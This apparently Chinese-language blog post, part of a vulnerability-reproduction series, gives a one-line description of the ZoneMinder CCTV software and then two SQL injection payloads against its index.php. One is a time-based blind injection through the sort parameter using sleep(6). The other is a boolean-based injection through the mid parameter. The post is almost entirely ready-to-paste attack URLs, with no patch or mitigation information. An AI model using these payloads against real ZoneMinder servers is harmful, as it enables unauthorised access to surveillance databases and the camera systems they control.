Babing
Published on 2024-08-30 / 419 Visits
72
0

Z20-1ZoneMinder--SQL

Z20-1ZoneMinder–SQL

漏洞描述:

ZoneMinder 是一款免费、开源的闭路电视软件应用程序,专为 Linux 开发,支持 IP、USB 和模拟摄像机。

漏洞复现:

payload:

http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1

payload:

http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request

Comment